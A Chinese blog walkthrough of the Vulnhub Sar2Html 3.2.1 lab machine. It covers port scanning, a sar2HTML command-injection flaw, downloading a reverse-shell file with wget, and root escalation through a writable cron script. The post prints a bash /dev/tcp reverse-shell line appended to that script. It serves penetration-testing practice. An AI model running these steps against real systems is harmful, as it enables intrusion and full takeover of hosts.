Vulnhub_Sar2Html Ver 3.2.1靶机渗透测试

最新推荐文章于 2024-06-12 17:49:58 发布
最新推荐文章于 2024-06-12 17:49:58 发布
阅读量142 收藏
点赞数 1
分类专栏: Vulnhub渗透测试靶场 文章标签: 网络 服务器 linux 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/132992571
版权

Sar2Html Ver 3.2.1靶机

文章目录

信息收集

使用nmap对目标网段进行扫描,得到靶机IP地址为192.168.78.158,对其进行端口扫描和漏洞扫描,得到开放端口 80 ,而且存在robots.txt和phpinfo.php文件可访问。可以得到隐藏目录和一些版本信息了

image-20230718221704080

web渗透

  1. 访问robots.txt文件,得到了一个隐藏目录

image-20230718221943295

  1. 访问该目录,得到了一个小目录,没有什么思路,在网上对sar2HTML进行搜索,发现是一个小工具,而且当前版本存在历史漏洞,可以进行远程命令执行

image-20230718222105224

  1. 查看远程命令执行利用代码,发现只需要使用;闭合plot即可,后面可以跟任意的系统命令

image-20230718222113489

  1. 当然不能忘记可以使用searchsploit 来对该工具进行漏洞搜索

image-20230718222259623

  1. 尝试进行测试远程命令执行,发现成功执行,证明漏洞可行

image-20230718222403585

获取shell

  1. ls发现的是网站的/var/www/html目录下,使用nc -e等命令进行反弹shell失败,尝试使用wget命令将反弹shell的代码文件下载到网站目录下

image-20230718223133728

image-20230718223235547

  1. 再次使用ls命令,查看文件是否已经下载到网站目录下

image-20230718223500187

  1. kali主机监听7777端口,进行访问2.php文件,成功得到shell

image-20230718223543843

提取权限

  1. 查看是否具有suid和sudo -l提权方式,很好没有

image-20230718224221139

image-20230718224229502

  1. 再对定时任务进行查看,发现了一个每五分钟使用root权限执行的一个脚本 cat /etc/crontab

image-20230718224324289

  1. 对定时任务进行访问,发现该脚本就在网站目录下,查看发现该任务会执行一个write.sh脚本

image-20230718224454133

  1. 再对write.sh脚本进行查看,发现会执行touch命令,查看脚本文件的权限,发现web用户可以对该脚本进行写操作。那就很明了了,直接写入反弹shell的语句,等待root权限反弹即可

image-20230718224529279

  1. 使用echo 命令 >> 文件名方式对指定文件写入指定命令,并且立即监听7777端口

echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.78.145/7777 0>&1'" >> write.sh

image-20230718224802724

  1. 几分钟后发现成功接受到root权限的shell

image-20230718224938351

  1. 直接来到root目录下,查看flag即可

image-20230718225018628

image-20230718225026842

  1. 值得一提home目录下有一个love文件夹,尝试查看桌面上的文件信息,发现一个user.txt文件,里面内容是md5加密,解开之后依旧是user.txt,不知道有何用意

靶机总结

  1. 依旧是使用nmap进行信息收集,只开放80端口,就需要在网站上寻找突破点了
  2. 本次靶机web网站使用的是一个sar2html工具,该版本存在远程命令执行漏洞可以利用
  3. 善于进行搜索,发现可疑的名称版本信息去寻找是否有相应的漏洞
  4. 能进行命令执行,那就可以选择直接执行反弹shell的命令,不成功就选择wget下载反弹shell的脚本文件
  5. 本次靶机提权使用到的是定时任务进行提权,提权方式相对简单,只要找到对应的定时任务脚本查看里面内容即可。查看文件权限是否是当前用户权限可以写入的,然后直接写入反弹shell命令,等待监听shell反弹即可
生而逢时
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sar2html-开源
05-25
Sar2html是基于Web的性能监视前端。 它将sar二进制数据转换为图形格式,并将历史数据保留在其数据库中。 项目主页在这里:https://github.com/cemtan/sar2html.git支持的操作系统:HPUX 11.11、11.23、11.31 Solaris 5.9、5.10、5.11 Redhat 3、4、5、6、7 Suse 8、9 ,10,11,12 Ubuntu 18,20如果您的客户在上述操作系统上遇到性能问题,则可以发送sar2ascii来收集性能数据。 然后,您可以绘制性能图形,并通过sar2html以pdf文件格式生成性能报告。 请记住,捐赠鼓励开发人员实施更多。
实战打靶集锦-012-sar2HTML
阿尔泰野狼的博客
03-19 466
本文记录博主的一次打靶经历。
【学渗透靶机——sar 1】
jieli0901227的博客
06-20 518
主机漏洞扫描完成,这台靶机只开放了80 端口,通过nmap l漏洞扫描发现有robots.txt 和phpinfo.php 两个文件。切换到目录、var/www/html下 查看finally.sh ,这个脚本调用了write.sh ,robots 这个文件是方式爬虫爬取网站的,那么这个字符串有可能就是路径了,访问看看,80 端口默认页是一个apache服务的默认页面,没有什么特殊的地方。1、首先靶机主机ip发现, 端口扫描(),nmap 漏洞探测。那就好办了,,尝试利用下,镜像下来,打开看看。
vulnhub Sar: 1
箭雨镜屋
05-04 1207
渗透思路:nmap扫描----dirb扫描网站目录----exploit-db查找exp----利用sar2html的RCE漏洞getshell(base64编码)----利用定时任务提权
靶机练习之sar
qq_52360932的博客
04-01 4593
靶机练习之sar,学习笔记
SAR.rar_SAR文档_SAR测试参数
07-15
SAR真程序,经测试有效,文档中的参数可作适当修改,初学者适用有效
SAR.rar_SAR_SAR 成像_sar 成像_sar成像
09-23
基础的的SAR成像源代码!能够实现运行,供学习参考
sar.rar_SAR MATLAB_SAR radar _SAR仿真_SAR雷达
09-22
sar仿真,用于雷达的。程序简单,好用,适合初学者
adctest32.zip_ADC 动态 静态_SAR ADC_SAR ADC测试MATLAB代码_SAR_ADC
07-14
针对12bits SAR ADC进行静态和动态性能仿真!
SAR_Image.rar_SAR_SAR 分割_SAR分割_sar图像分割
09-24
该文主要是介绍一种基于区域MRF的SAR图像快速分割算法
靶机渗透之sar
weixin_64267091的博客
02-28 1068
靶机渗透过程也就分为那几步骤,首先就是信息收集,找ip,端口,目录,漏洞。然后就进行漏洞分析,在进行漏洞分析的时候使用到了kali中自带的工具searchsploit,使用它搜索sar2HTML存在的漏洞,然后将漏洞利用脚本拷贝到本地,最后得知漏洞利用方式。最后就利用远程代码执行漏洞,上传反弹shell脚本,上传脚本一直出问题,也不知道为啥,最后上传了个shell.py,反弹成功。然后就是最后提权部分,利用了计划任务提权,获取root权限的关键是finally.sh脚本以root用户的权限来执行。
vulnhub sar 靶场练习
鸥鹭忘机
09-07 2055
前言 这次练习的靶机vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。如果看过我前面vulnhub DC系列的文章,那么这次靶机可以独立自主完成。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击sar靶机,然后选中配置。依次点击网络配置->NAT模式->高
vulnhub:Sar
cjstang的博客
06-16 755
OSCP-2:这次练习的靶机vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。 主要利用方式:sar2HTML命令执行反弹shell(可php文件上传反弹shell)+定时脚本提权......
Linux 从 sar 到 sar2html 的认识
记录创业路上的一些想法
07-24 2656
Linux sar
行走的漏洞利用机器人:僵尸网络病毒携71个EXP占领高地
whatday的专栏
12-31 972
前言 僵尸网络 Botnet 是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序)病毒,从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。 攻击者通过各种途径传播僵尸程序感染互联网上的大量主机,而被感染的主机将通过一个控制信道接收攻击者的指令,组成一个僵尸网络。之所以用僵尸网络这个名字,是为了更形象地让人们认识到这类危害的特点:众多的计算机在不知不觉中如同中国古老传说中的...
Wireshark TS | 应用传输丢包问题
7ACE的博客
06-09 712
Wireshark TS | 应用传输丢包问题
网络安全技术实验一 信息收集和漏洞扫描
zzzfff__的博客
06-09 968
了解信息搜集和漏洞扫描的一般步骤,利用Nmap等工具进行信息搜集并进行综合分析;掌握TCP全连接扫描、TCP SYN扫描的原理,利用Scapy编写网络应用程序,开发端口扫描功能模块;使用漏洞扫描工具发现漏洞并进行渗透测试
Android WebSocket长连接的实现
最新发布
Billy_Zuo的博客
06-12 1225
WebSocket 协议在2008年诞生,2011年成为国际标准。所有浏览器都已经支持了。它的最大特点就是,服务器可以主动向客户端推送信息,客户端也可以主动向服务器发送信息,是真正的双向平等对话,属于[“服务器推送技术”]的一种。WebSocket的特点包括:建立在 TCP 协议之上,服务器端的实现比较容易。与 HTTP 协议有着良好的兼容性。默认端口也是80和443,并且握手阶段采用 HTTP 协议,因此握手时不容易屏蔽,能通过各种 HTTP 代理服务器。支持双向通信,实时性更强。
单向环形链表的创建与判断链表是否有环
weixin_47011594的博客
06-10 191
判断链表是否带环,只需要使用两个指针,一个步长为1,一个步长为2,环状链表这两个指针总会相遇。单向环形链表的创建与单向链表的不同在于,最后一个节点的next需要指向头结点;
csdn pga_sar
08-30
CSDN平台上的pga_sar是一个数据分析工具和算法库。pga_sar提供了一种高效地处理和分析系统性能数据的方法。它可以帮助开发者和系统管理员更好地了解应用程序和系统的运行情况,从而优化性能和管理资源。 pga_sar...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值